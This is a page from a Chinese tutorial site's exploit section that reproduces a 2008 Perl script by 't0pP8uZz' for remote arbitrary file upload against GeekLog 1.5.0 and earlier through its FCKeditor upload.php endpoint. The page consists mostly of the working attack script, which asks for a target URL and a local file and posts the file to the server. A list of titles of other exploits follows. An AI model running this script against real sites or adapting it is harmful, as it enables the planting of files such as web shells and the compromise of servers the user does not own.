手机
当前位置:查字典教程网 >网络安全 >Exploit >GeekLog
GeekLog
摘要:#!/usr/bin/perlusewarnings;usestrict;useLWP::UserAgent;useHTTP::Reques...

#!/usr/bin/perl use warnings;

use strict;

use LWP::UserAgent;

use HTTP::Request::Common; print <<INTRO;

GeekLog <= 1.5.0 Remote Arbitrary File Upload

Discovered && Coded By: t0pP8uZz

0day?!?Most sites need custom configuration files

for this exploit to actually work, anyway enjoy

Discovered On: 20 August 2008 / milw0rm.com

Script Download: http://www.geeklog.net

INTRO print "Enter URL(ie: http://site.com): ";

chomp(my $url=<STDIN>);

print "Enter File Path(path to local file to upload): ";

chomp(my $file=<STDIN>); my $ua = LWP::UserAgent->new;

my $re = $ua->request(POST $url.'/fckeditor/editor/filemanager/upload/php/upload.php',

Content_Type => 'form-data',

Content => [ NewFile => $file ] ); if($re->is_success) {

if( index($re->content, "Disabled") != -1 ) { print "Exploit Successfull! File Uploaded!n"; }

else { print "File Upload Is Disabled! Failed!n"; }

} else { print "HTTP Request Failed!n"; } exit;

【GeekLog】相关文章:

AuraCMS

Simple PHP Blog (SPHPBlog)

Mercury Mail 4.0.1 (LOGIN) Remote IMAP Stack Buffer Overflow Exploit

MS Internet Explorer (FTP Server Response) DoS Exploit

Maian Recipe

Joomla Component com_content 1.0.0 (ItemID) SQL Injection Vuln

BIND 9.x Remote DNS Cache Poisoning Flaw Exploit (spoof on ircd)

CodeDB (list.php lang) Local File Inclusion Vulnerability

Easy File Sharing FTP Server 2.0 (PASS) Remote Exploit

WS_FTP Home/Professional FTP Client Remote Format String PoC

精品推荐
分类导航